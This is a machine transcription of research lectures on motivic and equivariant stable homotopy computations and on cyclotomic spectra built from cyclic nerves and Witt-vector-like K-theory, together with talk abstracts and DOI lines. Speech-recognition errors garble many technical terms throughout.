Bachman, who was here, may or may not be here right now, has been here sometimes this week, probably can tell us a lot more about that, right? So that's an interesting question. My first question is what about the co-operations, right? What about, do we know anything about the operations in Milnervit Motivical Homology? Because again, for explicit, that may or may not be the most important question for people who study Milnervit Motivical Homology, but for the purposes of explicit computation, that would be kind of an important question, right? And I guess maybe the idea would be then the atmospheric sequence, you know, in this context then completely captures Milner K theory, right? Something like that might be the way that that works out. I don't know. Good question. Sounds like an interesting project, but I don't know enough to assess whether it's realistic or not. I'm not saying it isn't, I just don't know. Then another question from Andy Baker. Yeah, I see that. Yeah. All right. I'm getting a question. Discussion time. Sorry? Discussion time now. Yeah, yeah, yeah. I mean, this is fine with you if I keep going, right? As long as there are questions, right? Yeah, in fact, I'm here during the day. Okay, great. Okay, great. So, I think that the difference between NuBar and Todas Epsilon, right, is Adas Sigma. Okay? And so Adas Sigma is a multiple of Ada, and so it's in the indeterminacy. So the actual answer, Andy, is that it detects both of those. And there's, yeah, there's sort of, well, I could go on, I'm going to restrain myself, right, because I could start kind of like, I could riff on this subject for a long time, right? But it's both because of that. And you have to straighten that. One of the tricky things you have to do in the eight and nine stem is you have to sort out the difference between them, and there's actually kind of some hidden structure there that you need to kind of be really careful about the difference between NuBar and Epsilon. And yeah, depending on how you look at it, you kind of see it in different ways. Is there a way that we can see the question? Yes, Sean, I think if you go in the Q&A and you click on answered, there's like a tab for open and a tab for answered. And the answered ones are there. Is there a way to detect the non-triviality of a given framed manifold? Right. So this question about framed manifolds goes back to like the early, early history of stable homotopy groups, right? There's this close connection between framed man, co-borders and framed manifolds and stable homotopy groups, right? And there was some work. I mean, I think maybe even like Pi 3, right? So Pi 3 maybe was even studied this way, right? Before it got to be sort of impractical. So I think that in that range, you can be, you know, up to like Pi 3, say, I think you can be explicit about how stable homotopy elements interact with framed manifolds. And my understanding is that once you get beyond that, that things really break down, you really can't, you know, people don't really know how to sort of write things down in those terms. In a motivic or equivariant context, I'm not even quite sure how that's going to play out. I mean, I guess there's a lot of recent work, right, about how framings relate to motivic stable homotopy, right? And that seems like kind of a promising direction. But you know, again, because my sort of specialty, my interest is in explicit computations, I don't know to what extent that's, I don't know to what extent that's kind of like you can do anything explicit. Although I don't know, maybe go back and look at the old, you know, work of, you know, Rocklin and I forget, there's another name associated with that that I'm drawing a blank on right now. But go back and look at that old work and see whether they're, whether you can kind of come up with the algebraic versions of the kind of like the manifold construction that those guys were, those guys were studying. Okay, good. All right, there's a reference for Milner-Vitt based atom-structural sequence. That's, yeah, that's promising. Equivariate Motivate Homotopy Theory. I mean, so, you know, inevitably, one is going to need to take Equivariate Motivate Homotopy Theory seriously. Right? There is some work I'm thinking of people like Ormsby, Heller, who increase, right? And maybe others who have been sort of laying out foundations and some, you know, preliminary steps in the direction of Equivariate Motivate Homotopy Theory. For sure, there are interesting things there. I'd probably be doing myself if I didn't have like a lifetime's worth of backlog of other problems that I want to solve first. I think that's, I think that's a great direction to go in. I think the key idea about Equivariate, the key idea is sort of like to choose the right kind of goal, right? What are you trying to do with Equivariate Motivate Homotopy Theory? And one of the things I would like to understand to know more about, I think that we should know more about is the quadratic construction in that context. But anyway, but this is a wide open question. So yeah, interesting stuff. The risk of asking a way to be. Okay, I'm going to talk through this again. I'm happy to explain this again. No problem. Okay. So these diagrams that you see on the left, they are not really kind of rigorous things. These are more like mnemonics, okay, tools to help us sort of like, you know, so we can communicate with the other and we know what we're talking about without being, you know, super explicit. Okay. So the idea here is that you might want to construct a complex, okay, find a spectrum, okay, and that spectrum should have S mod beta, the two cell complex as a sub complex. So maybe I can write a little bit here, right? So we're looking for some, some complex X. It should have S mod beta, it should receive a map from S mod beta. And the quotient, the cofiber should be some sphere. I'll just put an S star for a sphere. Okay. That's one way of expressing the idea that, that S mod beta, it can is the bottom two cells, right? And then there's a third cell S star. Okay, and also there should be a map from a sphere into X and that, that this one corresponds to the bottom cell here, such that the quotient is the two cell complex S mod alpha. Okay. You might ask for one X that has both of these properties. Okay. And it turns out that there, that such an X exists if and only if alpha times beta equals zero. Okay. And then the same idea pertains here. Maybe you know, I don't quite know what to call it. Maybe we'll call it S mod gamma, comma beta. That's my name for the three cell complex, okay, should map into X and the quotient should be a sphere. And then a sphere maps into X and the quotient should be S mod beta, comma alpha. Okay. So that's a little more detail about exactly what this is. Now what this means, right, is somehow even more complicated, right, but you can kind of break it down into what the parts mean, right, and those parts have to overlap consistently and so forth. Oh, right. And so I was going to sort of sort of finish this up here. I should say that one X exists if and only if alpha beta is zero, beta gamma is zero, and zero is in the bracket alpha, comma beta, comma gamma. And so the point here is that it's inevitable that you have to study total brackets. The total brackets just simply are the answers to the questions that we care about, and so we need to study them.
|
I will discuss a program for computing C2-equivariant, ℝ-motivic, ℂ-motivic, and classical stable homotopy groups, emphasizing the connections and relationships between the four homotopical contexts. The Adams spectral sequence and the effective spectral sequence are the key tools. The analysis of these spectral sequences break into three main steps: (1) algebraically compute the E2-page; (2) analyze differentials; (3) resolve hidden extensions. I will demonstrate a variety of techniques for each of these steps. I will make precise the idea that ℂ-motivic stable homotopy theory is a deformation of classical stable homotopy theory. I will discuss some future prospects for homotopical deformation theory in general. --- Here is a general reference for the topic of my presentations: - a question about tmf: Lurie used ideas from derived algebraic geometry to construct the classical spectrum tmf. Can this program be transported into motivic homotopy theory? Can we construct "motivic modular forms" spectra over some class of base schemes? For a construction of mmf over the complex numbers, see B. Gheorghe, D. C. Isaksen, A. Krause, and N. Ricka, C-motivic modular forms, J. Eur. Math. Soc., to appear.
|
10.5446/50939 (DOI)
|
So the title is Motives from a community point of view. As a reminder, kind of take away from the last two talks is that the reminder. I have introduced so you have some fix some some base commutative ring K. I have a K algebra. Define the invariant which for lack of better word I called with K theory of AM. Which is roughly speaking I take the tensor algebra of AM generated by AM over A. I take its K theory I completed with respect to the natural iteration by degree and I take out the constant charge. And this is a very nice invariant. First of all, it's the structure of trace theory which I discussed in my last talk, which allows you to do lots of computations with it. In particular, the study of this for general AM reduces to the situation where A is just K. And then if specifically K is just a perfect field of characteristic P. Then the answer for this is very surprisingly easy, namely that this K theory of K. In degree I actually vanishes unless I is not one. So it's only exist in one degree, which allows you to construct all sorts of explicit models for this becomes a generally very accessible invariant. So today I want to discuss cycle atomic structure on this day. But before I do that, there is something else I want to explain. So this is a very useful invariant, but this is kind of not the most fundamental. So there is another invariant which gives rise to this guy and some other invariants, which was kind of the original idea behind whole business. And this invariant is devoted to the notion of a cyclic node. So I had this for two categories already when I introduced this theory, but just for ordinary categories. So let me remind you of this category lambda. If we consider the fiber category over the object one, so this is objects and equipped to the map to one. And this is actually equivalent to delta, the category of finite and empty ordinals. And this is clear geometrically. So objects and lambda are both categories of quivers. I mean, there are different definitions, but the one I gave you works like this. So there are some quivers. And when you have a map to one, this means that one edge of the quiver becomes distinguished. So there's one edge which is now distinguished. And you can just erase it. And if you erase it, you end up with basically a node. So it's a quiver now, which is not a wheel, but just a string. So this corresponding category just a partial dot loader set with some elements. So this gives you the equivalence. So now if we have some small category i, and we have some function from my opposite, that is i to sets, then we can define a simple set, which is known as the, no, I'm sorry. So definition, cyclic nerve. So I had this already last time, but without coefficients. Now I need to use coefficients to cyclic nerve of i with coefficients in f. It's a simple set. It's a function from the opposite to sets. And this I interpret as now opposite to the fiber category. So let me describe you what the values are. So if I have some object here, which is, yeah, I think of as my wheel quiver. That for the usual cyclic nerve, the values would be the set of configurations like this. So I have an object, each vertex. So one by two and so on. And then there are maps of zero, one and so on. And then so f, f, l is actually a map from i, l plus one, for l from zero to f. And then the last map. So for the usual cyclic nerve, it's again just a map of the category, but here I'm modified. Here fn actually is a map from, it's actually an element in f applied to i, n, i zero. All right. So this does not have a cyclic symmetry. I broken the cyclic symmetry by choosing one edge. But more than that, it's okay. So it gives me a simple set. So there's a question. How does a map from, to one gives a distinguished error? Okay. Or is this a map from one? No, it's a map from one would give me distinguished vertex. Just for this vertex. The point is that the category lambda is actually self-dual. Kind of the fanciest way to see it in terms of this functional description which I had, I mean, described maps as, as functions between some categories. Well, those functions have adjoints and you just take the adjoint. But also if you think geometrically, you think of realization of the quiver as some kind of, you know, solar decomposition of the circle. So there's a map from a circle to a circle. But then if you take an edge in the target and you take its preimage, then it lies inside a single edge upstairs. So there is some kind of sort of function which associates to my object. The set of edges of the decomposition is actually contravariant. And this gives me the distinguished edge. Perhaps I should draw a picture. It's not so easy to draw in this zoom thing, right? So the target is just one. Here I have some points. And then if you look at what the map actually does, you see that it has to contract all the edges except one to this point. So all this must be contracted and there is exactly a single edge which is not contracted. And that's the one that I chose. I hope that's clear. Yeah, okay, thanks. Right. So there is a cyclic nerve and then you can consider this geometric realization with some kind of topological space. Spaces. And now specifically for A, so you have P of A, which for me was the category of finely generated projective A models. And then the bi-module M defines a function P of M from P of A opposite. That's P of A to, well, to carry out the space, but at least for two sets, right? It's just a very naive one. So because P dash times P goes to home from P dash and then M times the A. So I can consider the cyclic nerve of this category P of A of the efficiency in this by function. And this can be called cyclic theory space. Perhaps I shouldn't, oh, it's a space, right? So dot would be the number of the groups. So this realization of the cyclic nerve P of A. And historically, this I think is what Dave writes to call. So this was considering this guy was suggested by Goodwill in a somewhat famous but unpublished letter. Well, 2000, Goodwill, well, well, 2000, from about 80. The point is, I mean, this, this is just a space, but it also has an interloop space structure if you just take direct sum of everything. So it's actually a spectrum and it's somehow better than say with K theory, which I considered because it's reasonably small. So for example, if K is a finite field, then this is just countable, right? So it should be something which is a computer, but in fact, it's not. So problem. That is very hard to compute. There is not enough structure. For example, we don't know as far as I understand, even now we don't know what it gives for just, you know, the point. Even the case of finite field, even the physical field. So in order to get some handle on this, we need to do something to use it to construct some more invalents, which are more amenable to computation. And in practice, what you do, you need some kind of completion. And this can be done in different ways. So for example, there is a theorem, which I believe is due to Lyndon Stowes. McCarthy, which says that if you take this, so this is a function of two variables, you treat it as a function of respect to variable M, this additive variable. So you can do what is known as goodwilly completion. Completion is in the sense of goodwilly calculus. Well, for people who have more algebraic like me, this just means something like proper polynomial completion with respect to M. So some factors are additive. If functions are not additive, you can write down the correction to this called cross effect. This is a function of two variables that can again be additive for not in each variable and so on. So there is a whole theory of polynomial functions developed originally by both of them, I believe. And you can sort of try to compute the best approximation polynomial expression to the function. And if you do it for cyclic theory, you get something which appears also in the theory of the cyclotonic phase. It's a spectrum called TR of A coefficient in M. And already this behaves nicely. So already for TR, again, if you just plug in the finite field, so TR, okay. Again, I can consider any M, but if I consider, if I write just TR of A, this means diagonal by moment. So this again behaves as my withK theory. So this is zero unless I zero if K is finite, say, perfect. Positive characteristic. So this already can compute. And of course, if you look in the there is a question, Dimitri, the good, there is a question, the good willy completion is just the limit of a good willy tower. Yes, yes, yes. I mean, personally, I always think about troponinomal completion because it's easier visual language break. Right. And by the way, the biological Hohschild homology appears as the first term of the towers, actually just the additive if you want the de-tivization of this cycle. It's basically the linear part, linear respect to M. Another thing which you can do, you can look at these guys, if you're all trying to fill, you can try to look at them as algebraic varieties. I mean, the cyclic nerve is simply shall set, but you can put some kind of algebraic structure on that. And look at it as some kind of simple, shall I find scheme and use that structure, this would also give you some completion, which is more or less the same. This has not been written down, I believe, but because I mean, we can do it more easily by good willy completion, but it can be done, gives you the same answer. And then also there is something which should be Ethereum, but I think there is no direct reference in the literature. So I put quotes here, is that my with K theory is actually also the same. So this is a problem of completion also gives me why with K theory, but up to a shift. So let me use logical. So let me think about not new deal groups, but say spaces, spectrum, this will be so I need to shift by one. So there is this loop thing, all this WK. This is not an literature, unfortunately, we discussed it with Thomas Nicholas at some point. So I mean, you can cook up a proof if you just assemble known, known results. But it's probably better to do it in some kind of conceptual way, which as yet is not done. So there's no radio difference, but this is never less. So kind of the take away is that the fundamental thing is the cyclic nerve, which is, which generates all the other environments. Cyclic nerve itself is hard to compute. But then you apply also various sorts of approximation to it. And this gives you computable invariance, which can be then compared. Okay, so this is what I wanted to say about cyclic theory. And now let me discuss cyclic nerve structures. So I need to discuss first equivalent aspect and so on. So let me start with the finite group. Now, first unstable. So as I mentioned last time, actually, when you think about j-covariant spaces, there are two types of homotopy category you can consider. So one is the naive homotopy category, or maybe crude, homotopy category of j spaces. So object spaces, selection of g. And then we just look at maps, which are the covariant maps, which happen to be with equivalences, homotopy equivalences, without regard to g. And then there are that. And this gives you, so in modern language, so if I denote by point to the index g, just, you know, the group point, which is the quotient of the point by g. So, you know, one object with group bottom of this is g. Then this is the homotopy category of functions from this guy to spaces. That's the naive thing. But then we can do a more refined thing. You can again consider j-covariant spaces, and you consider maps between them and classes of those maps up to j-covariant homotopy. And it's important to realize that this gives you a different, actually, much larger category, which can also be defined like this. So, sort of genuine g-spaces. This would be, again, a homotopy category. But now what you do, you consider the category of g orbits, or g, is the category. So a g orbit is a finite g set where g act randomly. So, it's a quotient by some subgroup, and morphisms are maps between those which are g-covariant. So, it's a category with, you know, some objects. I mean, since g is finite, there is a finite number of objects that correspond to subgroup. Well, isomorphism classes correspond to conjugated class of subgroups. But still, it's a category of non-verbal maps. It's an interesting thing. There is, of course, a forgetful functor, because if you look at just the orbit where g acts on itself, sort of, so the quotient by the trivial subgroup, then, a tomorphism, so this is just g itself. And this gives you an embedding from this point, modulo g to orbit. So, there is a restriction of functor. So, if you have a genuine g space, you can forget the rest of the structure, and then consider just naeubik. But there is something else. So, this category on the left is big. Alternatively, if you don't like, so orbit is something where g acts transitively. You can actually drop that condition. And we consider the category of all finite g sets. So, sets where g acts in some way, not necessarily transitively, maps are j-query maps. And then say that the functor from gamma g to spaces is additive. If it sends the joint unions to products. So, there is always a map. What's a contravariant? The fact, I'm sorry, here it's also supposed to be contravariant. Because what you associate to an orbit, if you have a space rejection, is just the space of fixed points, respect to the corresponding sum group. So, it's contravariant. Then for every functor, there is a map like this. And I want this to be a homotopy equivalent. So, this is my notion of additive. And then, this genuine category of g spaces, functors from orbits to logical spaces, can be also interpreted as, I consider, functors from gamma g now, logical space and vertical equivalences. But I consider only those guys which are additive. It's the full subcategory spent by additive. Okay, this was like space level unstable. Now, the slogan is that for spectra, what you do, you add, you do just one thing, you add transfer maps. And the way to do it, I mean, one way to do it, but the one which I think is the best, is by modifying the category gamma g. So, you consider a category which I will denote q gamma g has the same objects. So, q gamma g, same objects. Sorry, just a second. Objects are again just finite, as you said. But morphisms are now correspondences, 0s1. And morphisms are correspondences like this. Now, you could just take the isomorphism classes of those, but this would not be the good thing to do because it's too crude that destroys symmetry. So, you really should think of this q gamma g not as a category, but as a two category. So, here are objects, morphisms are like this, and two morphisms are isomorphism between these guys. So, for every two sets, the category of morphisms is actually the group of diagrams like this. So, this is what you do. And then, if you want now to define j-curve-variant spectra, then this is just a category. You notice like this. This is just a category of this q gamma g. So, I need to consider stable things. So, this is functions from q gamma g to spectra not spaces. And they have to be edited. In fact, if you do it like this, you don't even need to consider, you can also put spaces here. Consider functions to spaces. And this would automatically give you a spectrum because of some version of a single machine. So, all the spectra which are connective in an appropriate sense actually correspond to spaces. So, there is a fully f-cunded. None of this is in literature unfortunately, as far as I know, although it has been around for, I don't know, 15 years, everybody knows this, but there are no ready references. And that's part of the problem why we can't really prove some comparison theorems, which we would like to publish that. And part of the reason for that is technical, because first of all, this is a two category. So, this has to be really done some kind of a kind of a categorical setup to make it work. And that's, I mean, that requires some writing, right? So, people are kind of too lazy to do it. But nevertheless, it's all true. So, this is how things are. And in particular, there is a version of the single machine for the g spaces, which was introduced by Shamakawa long time ago, which boxes Shannon Matzin used. But that unfortunately is not strong enough. So, it doesn't give you enough control, it doesn't give you what I write here. So, one actually needs to strengthen that. And that's something which is still a bit nevertheless. Dimitri, there's a question by Shan Tilson. So, he says he asks, so, where aren't stable splitings equivalently? Stable what? Splitings. Where? Not sure. Yeah. Shan, can you be more precise? In the inclusion from g spaces to g spectra? I don't know. This is a fully faithful embedding. And I mean, downstairs, it's not g spaces anymore, because I added q, right? It's a function from, I mean, spaces would be if I just put gamma here. And this is q. So, if you want, so, there is a function from g spaces to g spectra, which is the suspension spectrum, of course. But this corresponds to some kind of induction from gamma g to q gamma g. But if you have a function from q gamma g, but to spaces, then this is already fully faithful. So, you don't need to. In fact, if you don't have g, you just take q gamma. And this very close, I mean, this contains this category of pointed finite sets. And that is exactly what goes into the single machine. Okay. Yeah. All right. So, so this how it goes. Okay. So, how do you see all those fixed point functions in this language? So, for g spectra, there are two types of fixed points. So, there is the geometric fixed points, and there is something which didn't have a name, and then they called it categorical fixed points. And now they probably call it genuine fixed points. So, it changes. So, one of them is very easy. One is just a valuation. So, so those genuine fixed points. How does it go? So, let me denote this by psi. So, for any subgroup h, you have a fixed point function psi h. And in terms of this function from q gamma, this is just a valuation at the genuine page. And for geometric fixed points, so what you do is first define something called inflation. So, inflation comes with the term inflation comes from the theory of makey and by the way, the makey factors is the same theory except target of your functions are not spectra but complexes. And then get the notion of derived makey functions. So, for makey function, I actually wrote the paper about this. It was not related to q. But anyway, so inflation. So, if you have some subgroup, instead of g, you can consider a normalizer. Kind of h. So, it's normalizer. And then you consider the quotient. It's somewhat similar to a wild group in the group theory. And then you observe that for any h. So, for any h, we have a function which does the following. So, we take a small five h. So, we take q gamma and this goes to q gamma g and this goes to q gamma w of h. So, you take a set and you just send it to the fixed points. So, if you look at the set of fixed points, then the normalizer acts on this set. But h actually acts trivial. So, the action actually factors through an action of w of h. So, as h is naturally w of h set. So, that's this. And then you prove a lemma. So, you have the factor and then you can consider pullback. After commutes with these joint unions, so it's an additive guys to additive guys and then so you get pullback from well, w of h spectra to j spectra. This is called inflation. And then lemma is that this actually fully faithful. This is something you have to check. I can't really comment on this. This is not that difficult once you realize it's true, but it's kind of surprising. If you have to prove it is not obvious, they won't do it. And once you do that, so once you do that, you can consider it's adjoint. So, it has an adjoint. So, left adjoint. Left adjoint. Why? Let's say hat from g spectra to w of h spectra. And then the geometric fixed point function is exactly this compulsive just forgetful. This evaluation of w of h just goes to spectra. So, geometry fixed points of some x are obtained by applying this guy. And then evaluating at the trivial. I mean not trivial, but the biggest orbit. All right, so this is how we see all those guys. And the general picture just follows. So, this category of just spectra is actually a triangulated category, well stable if you want. It has some kind of semi orthogonal decomposition. Maybe I should write this because this is important to keep in mind. In fact, it's already in the original paper of May Lewis and other people where it was invented, but the longest error was different. So, it's not stated cleanly in these terms. So, it took me some time to extract it from there. So, let me share this knowledge with you. So, in general what happens is that this guy has a semi orthogonal decomposition. It has a filtration. The composition is glued out of pieces. Pieces are numbered by conjugacy classes of subgroups. Or if you want isomorphism plus of objects in O of G. And the pieces are just very naive things. So, these are spectra with the action of w of H. Let me denote like this. The Hammond's category of factors from some guy to spectra as T here means stable. So, this is the most naive version of the covariance table category which you can consider just spectra with action of a group. And the genuine thing is glued out of those guys. And the green factors, green data, are some sort of generalized state commons, respect the families of some generalized state commons. So, that's the basic picture. The category is huge but it has those sectors corresponding to subgroups which are easy. And then there's some gluing but the gluing is not that. I mean, for example, if you restrict the attention to things which have find homological dimension in some sense, then all those state commons will disappear and the pieces will just be earth. Okay, so this is the general setup for equivalent stable homotopy. Now, this was finite groups. And traditionally, the level of generality in topological sources, I mean, people who invented it, would be for more generally compared to groups. So, can do and one can do the version for compactly groups. Of course, now those categories have to be apologized so that the home sets would actually be some kind of multiple types also. But the point is that we don't need it. This is maybe strange because you would think that the circle would come into play, right? But in fact, if you look closely, nowhere in this psychotomic business, you have a genuinely equivalent spectrum respect to the circle. Because as I said, the G equivalent category has those sectors corresponding to subgroups. So, for the circle, subgroups are cyclic subgroups and then the circle itself. But the latter never enters the picture. So, people only consider the part which corresponds to cyclic subgroups. So, effectively, it's only genuinely equivalent to respect to all those cyclic subgroups on the circle. That's all you need. You don't need the circle. Conversely, as I will argue in a moment, what you do need is to arrange the same cyclic subgroups in the other direction. Instead of taking kind of the embeddings from one to the other, you should take the projections and not the kind of inverse limit, which is the group of cross-reunit, but conversely, the projective limit, which is the profiling completion of Z. So, instead, let us... So, instead, what we need to use is actually a version for finely generated by... But profiling it... Profiling it... For example, df. And then the option is that it works exactly the same as before with one modification. So, where am I? So, now if G is a profiling, then you can adopt the same, but you slightly change the notion of finite sets. So, instead of finite G sets, we now consider admissible G set. And this is two conditions. So, first of all, for any point, the stabilizer of the point is finite index of finite. So, it's a union of finite orbits, but maybe infinite union. But, however, for any fixed co-finance subgroup, the fixed point sets is finite. So, it's a union of orbits, finite orbits, but each finite orbit can appear on a finite number of times. So, they can grow, but then the size of the orbit has to move. And so, this is the only modification. So, this gives you some kind of category, gamma and g hat. And the rest of the story is actually the same. So, they give you some kind of notion, I would respect them now for a profiling. Okay. Now, what has it got to do with the fixed point? And now I can answer the question, which I was asked actually at the very end of the last talk. So, I said that it deserves a good answer. And this is the answer. So, the question is what my definition of the category lump, which I defined categorically, maps were some functors, but I only allowed for which had some degree, but they only allowed functors of degree one. Questions, what if I allow functors of degree, which is not one. And the answer is that this actually fits very nicely with this perspective point. So, definition. So, Dimitri, there are questions about finite index. So, by Remy Pondob and De Bruyne, he asks, when you say finite index, do you mean open? You are very continuity condition on objection. Yes, I mean, I'm working with profiling groups with the profiling topology, find, finitely generated and then open and the confines of the same. Finitely generated, profiling group, I mean profiling complete. All right. So, it's profiling topology, so it's open. I mean, the example I actually need is on the Z hat, but I think the theory works for all finite index. Okay, so definition. Cyclotomic category. Lambda R. So, objects are still the same as lambda, so these are just n. But now maps are the same as the other. Now the condition is that the degree is not zero. So, there are some functions which just end everything to an object and all the maps to the identity, which are not interesting, sort of degenery. There are one things which are not degenery in this sense, but then I allow all degree. Now, an example of something, so if degree is one, then this is power lambda. So, let's say that the map is horizontal. Horizontal. So, what's an example of a map of degree which is not one? The basic one is like, we take some nL. And this has, so this is a circle, so this has an automorphism of other L. And we just take the quotient, right? You can take the quotient and the level of the quiver, in fact, even the pocket, but it will be the quotient. So, there's a quotient map. And I want, I say that the concrete is vertical if this isomorphic to this kind of quotient. There is also a categorical notion of discrete cofibration. If you know what that is, then this is the quiver. And then this horizontal and vertical maps form what is known as a factorization system of lambda r, in the sense of Balsfeld, which means some things, in particular, it means that every map in the cyclotomic category factors uniquely. So, every map factors unique, klepto-unique isomorphism as, you know, there is first of all some kind of horizontal map and then some kind of vertical map. Horizontal, this is vertical. And conversely, if you have a diagram like this, if you have a vertical map and a horizontal map, then in this category you can form actually a Cartesian square. So, there is a full back square where this h prime will be horizontal and this will be vertical. Okay, now if you look at this lambda r and you only consider horizontal maps, and this I will denote by the index of lambda r or only the horizontal map and this is of course just lambda. But if you look at the vertical map, then this is the category of orbits for the group z. Oh, which is the same thing, I mean orbits are finite by definition, so this is the same as orbits for its profiling completion. And so lambda r combines both lambda and orbits for this group. And so in order to define the cyclotomic things, and this would be kind of the clean definition of the cyclotomic spectra, which is I think the most conceptual clean one, you just take this lambda r and you repeat the procedure you did for the orbits. So, first of all, you need to add these joint unions. Somebody should mute the testing. Okay. Now add. And somebody mute somebody, I mean, okay, thanks. Now add these joint unions. And in fact, finite but also infinite but sort of admissible in the sense which I had before. So I had formal unions, you know. Let me take this. Okay, sorry. Thanks. Yeah, you know how to do this, right? You go to participant list and then mute somebody. Oh, yeah. You can do it. Yeah. So, you can see the things like that. Admissible means that for every n i there is only finite number of n terms here. So, this gives me some category which I need some notation for, so let me call it what. I don't know. What's in my nose? Lambda r gamma. Oops. Lambda r gamma. And then you do this Q thing. Well, for orbits you can do just correspondences and when I said correspondences, I didn't tell you how the compositions are defined. Compositions are of course defined by just taking pullbacks. And that's why it's not a good idea to restrict yourself to orbits because if you take two orbits and take the product, it will be a G set, but it can now split into several orbits. So, you get the joint union sort of by necessity if you want to have compositions. And so in this case, this way had to add this joint unions here too and then what you now define. Now consider so Q lambda r gamma, right? So objects are in lambda r gamma. And so maps are correspondences of the following types. So there's some kind of generalized L. I mean this n is actually a disjoint unit of some kind, right? There is some m dot. And then there is a diagram like this. So the only difference is that here I can allow on the right I can allow any maps, whereas on the left I only allow vertical maps. Normally I need to do this because my pullbacks only exists for vertical maps. And in this category lambda r gamma, once I add up the disjoint union, vertical maps admit all pullbacks with respect to both horizontal and vertical maps. So this will define category, well two categories maybe. Now the definition. Definition. Cyclotonic. I put quotes here because it's not the definition of the literature and the fact that the same is not. There is no published. It's what I want to be a definition. That's true. And additive. Okay. And why I think that this is a good definition, because you get everything basically for free now. So first of all, this is obviously a cyclotonic spectrum. And this definition. I mean, I explained why this is a cyclic object. Just by considering, you know, we have a quiver you consider a tensor algebra, replace the center of the path algebra the quiver. And instead of K theory for that. And this is obviously factorial. And exactly the same thing goes for cyclotonic structure. And if you have a vertical map then there's a certain function which has an adjoint and both induce my from K theory. And there is also a notion of a typical. Everything, which starts with actually lambda are. Well, I only allow maps such that the degree of the map is the power of five prime prime p. And then I can repeat the procedure I can see the consider at the joint unions consider the take the portion, K, Q, K, so on. So there is this category of cyclotomic spectrum. And there is a category of typical cyclotomic spectrum. But then what's funny is that there's, you can construct some kind of inflation. And it becomes actually an equivalent once you invert. No, not not be conversely, once you localize it. So let me write this in words equivalence. You will clear. So I had to split this with K theory into pieces to obtain the typical one but once you do the cyclotomic story then this becomes kind of automatic. And then you can also describe this can be described in terms of, as I said this filtration also can be described. In terms of sectors in terms of semi orthogonal decomposition and gluing day. In fact, in this case, there will be only one sector this will be just the circle. So this would be spectra in the next one of the circle. And, as I said this generalized state come all of you which enters the picture often vanishes. In this case, in fact, if you're a local. The relevant come all to their vanishes in all cases, except for the cycle group of water p. So p square p cube and so on all these guys don't contribute. So the only thing you get is actually order p. And this gives you this Nikolaos short description. This works like magic just because you know, we're lucky. And this semi orthogonal decomposition is almost orthogonal there is only one possible. And there are no conditions on the glue either so this is kind of free free pre algebra situation so this suggests that this is a very, very easy and direct description of psychotomic spectrum and this exactly what Nikolaos and Schultz did. For computation this of course what you want to use and this what people use nowadays nowadays with a huge success. But for conceptual reasons I think the correct definition is the one that they gave. And so these are some motivations and the kind of the main motivation for looking at this picture for me is that it also works with coefficients. So kind of the whole gist of my lectures was probably that you should. If you can you should generalize your things to non commutative setting and allow coefficients, because then at some point, you can reduce the linear out so it's crucial to work with coefficients. So what coefficients. So WK of AM is not a psychotomic spectrum anymore we lose the cyclic symmetry, but it's still. Genius, a current spectrum spectrum. Particularly have those fixed points and then. There's this KHH. And this is actually appears just as a geometric fixed point so respect to the whole group. And as a reminder, the guy itself should be more than the same as TR. Okay. My time is up but let me make a minute. I'm practically done so to recapitulate so this WK of AM, as I said, should be the same as TR. Historically, TR was defined in terms of THH. But actually the relationship is symmetric in fact. So TR, HH, in fact, TR is maybe more fundamental so this can be recovered as. Fixed points. And then historically it's not around TR was obtained as inverse limit of categorical fixed points from THH. But the difference is that what I have here you can do with coefficients and that's much easier to prove because you reduce to a equal to K. So without coefficients, of course, you are okay. So without coefficients, THH has this some kind of residual. It has some kind of non complete S1 equivalent spectrum structure meaning that it's spectrum S1 action equivalent to respect to all the cyclic subgroups. And then it have this. So this stands for maybe it's better to do it. Minutation. Minutation was like this. So in this sense, the two things define each other. And I think the picture with the hat is kind of more relevant for, I mean, it's closer to the point. I think this is it. I think this is all I wanted to tell you and thank you for attention to these three lectures and it was a pleasure to continue. So thanks. Thanks a lot for the talk. So are there questions? So maybe I have a first question. So you said on WKAM with coefficient, there's no secret to me structure. So can you explain why? Yes, because it broke the cyclic symmetry when they choose M. Okay, but if is there a choice of M where you can see. If you take the diagonal by Monio. Yeah. And the point is that even if you break the cyclic symmetry, so you break the S1 action is to get the Z-head structure, which I think is important to use. Okay, thanks. So any other questions? Okay, so I think it has no, no more questions. So thanks again for your nice and rich series of talk, and okay, we meet in half an hour. Thanks.
|
Motives were initially conceived as a way to unify various cohomology theories that appear in algebraic geometry, and these can be roughly divided into two groups: theories of etale type, and theories of cristalline/de Rham type. The obvious unifying feature of all the theories is that they carry some version of a Chern character map from the algebraic K-theory, and there is a bunch of “motivic” conjectures claiming that in various contexts, this map can be refined to some “regulator map” that is not far from an isomorphism. Almost all of these conjectures are still wide open. One observation whose importance was not obvious at first is that K-theory is actually defined in a much larger generality: it makes sense for an associative but not necessarily commutative ring. From the modern of of view, the same should be true for all the theories of de Rham type, with differential forms replaced by Hochschild homology classes, and all the motivic conjectures should also generalize. One prominent example of this is the cyclotomic trace map of B¨okstedt–Hsiang–Madsen that serves as a non-commutative analog of the regulator in the p-adic setting. While the non-commutative conjectures are just as open as the commutative ones, one can still hope that they might be more tractable: after all, if something holds in a bigger generality, its potential proof by necessity should use much less, so it ought to be simpler. In addition to this, non-commutative setting allows for completely new methods. One such is the observation that Hochschild Homology is a two-variable theory: one can define homology groups of an algebra with coefficients in a bimodule. These groups come equipped with certain natural trace-like isomorphisms, and this already allowed one to prove several general comparison results.
|
10.5446/50944 (DOI)
|
Let me start with a brief reminder of what I mean I won't remind everything with that one thing and so the setup is as follows have some key most case it will be perfect to fill the first characteristic but some key something that can be just a bit to the dream we have some a so last time it was community but in fact it doesn't even have to be that they associate if you need to let K algebra of course if we're over a field that's automatically flat now I define this environment actually didn't introduce a name for this let me do it now so I consider algebraic key theory of our series one form of variable t of coefficients in a completed so this section the inverse limit of k theories of truncating guys and then I notice that it splits as k theory of a plus something else which is of interest for me so let me call this something else with it's not standard name but I mean I need something like this double K of a and then there was a observation this is what really cutting the first lecture so if case p local this guy carries those on domorphisms silent and which are almost I don't put on if you if case p local and n is a divisible and n is prime to p then you can invert n and then you get an honest I don't put on another whole things plate product of copies was smaller guy called so this is kind of big with k theory and this is typical with k theory this is just the kernel of all of all those and this what is our interest in it is what I want to start so I said that in situation one case perfect field and a is community smooth this gives you the wrong with forms and particularly it has a differential so where the differential differential comes from a circle action this was the end of last so how does this go let me explain this now so I mean there are various ways to do it the one I prefer actually walls little bit of category theory but I think this is in the end the most essential player one so this is what I'm going to present partially it already appeared in talk by Tina on Monday in the form of a circle 